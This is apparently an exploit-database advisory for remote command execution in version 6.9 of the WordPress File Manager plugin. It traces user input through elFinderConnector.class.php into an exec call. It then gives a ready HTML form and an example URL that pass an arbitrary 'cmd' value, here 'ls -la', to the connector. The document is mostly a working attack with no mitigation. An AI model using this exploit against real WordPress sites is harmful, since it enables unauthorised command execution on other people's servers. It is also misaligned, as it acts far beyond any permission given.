[-] Title : Wp File Manager V6.9 - Remote Command Execution [-] Author : Milad Karimi [-] Vendor : https://wordpress.org/plugins/wp-file-manager [-] Category : Webapps [-] Date : 2020-10-27 Vulnerable Page: /elFinderConnector.class.php Vulnerable Source: 160: exec elFinder->exec ($cmd, $args) 108: $cmd = $src['cmd'] : ''; 93: $src[$key][] = rawurldecode($value); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), if(preg_match('/^(.+?)\[([^\[\]]*)\]$/', $key, $m)), if($idx) else , 82: list($key, $value) = array_pad(explode('=', $part), 2, ''); // list() if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 81: foreach($parts as $part) // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 78: $parts = explode('&', $rawPostData); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), 76: $rawPostData = file_get_contents('php://input')){ // , trace stopped 80: $src = array(); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 74: $src = array_merge($_GET, $_POST) : $_GET; requires: 71: ⇓ function run() Exploit Code: <html> <form action="http://localhost/lib/php/elFinderConnector.class.php" method="GET"> <input name="cmd" type="text"> <input type="submit" value="RCE!" > </form> </html> Exploit URL: http://localhost/lib/php/elFinderConnector.class.php?cmd=ls -la